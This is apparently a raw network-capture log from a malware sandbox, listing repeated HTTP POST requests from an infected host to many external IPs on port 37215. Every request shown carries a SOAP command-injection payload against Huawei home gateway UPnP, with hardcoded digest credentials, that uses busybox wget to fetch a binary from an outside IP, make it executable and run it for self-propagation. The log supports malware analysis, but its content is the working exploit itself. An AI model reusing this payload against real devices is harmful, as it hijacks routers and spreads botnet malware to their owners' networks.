6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  791192.168.2.1351626157.23.81.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417617083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  792192.168.2.1334914197.9.158.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417637110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  793192.168.2.1351666197.5.63.17637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417650938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  794192.168.2.1335976104.103.229.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417671919 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  795192.168.2.134350631.216.156.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417793989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  796192.168.2.1351912197.247.72.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417814016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  797192.168.2.1359010197.210.100.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417834044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  798192.168.2.1353366114.214.36.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417849064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  799192.168.2.1345802197.74.73.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417876959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  800192.168.2.1348170157.7.157.2137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.418016911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  801192.168.2.1360124191.80.30.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.418139935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
